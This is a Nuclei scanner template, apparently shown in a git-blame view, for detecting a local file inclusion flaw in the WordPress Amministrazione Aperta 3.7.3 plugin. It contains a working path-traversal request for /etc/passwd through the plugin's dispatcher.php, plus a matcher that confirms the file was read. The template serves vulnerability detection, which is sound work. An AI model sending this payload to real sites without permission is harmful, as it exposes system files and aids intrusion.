2022-03-29 12:58:21 +00:00
|
|
|
id: amministrazione-aperta-lfi
|
2022-03-29 12:55:33 +00:00
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: WordPress Amministrazione Aperta 3.7.3 - Local File Inclusion
|
2022-03-29 12:55:33 +00:00
|
|
|
author: daffainfo,Splint3r7
|
|
|
|
severity: high
|
2022-08-05 13:57:51 +00:00
|
|
|
description: WordPress Amministrazione Aperta 3.7.3 is vulnerable to local file inclusion.
|
2022-04-02 10:34:50 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/50838
|
|
|
|
- https://wordpress.org/plugins/amministrazione-aperta
|
2022-08-05 13:57:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: wp-plugin,lfi,wp,edb,wordpress
|
2022-03-29 12:55:33 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-08-05 13:57:51 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/08/01
|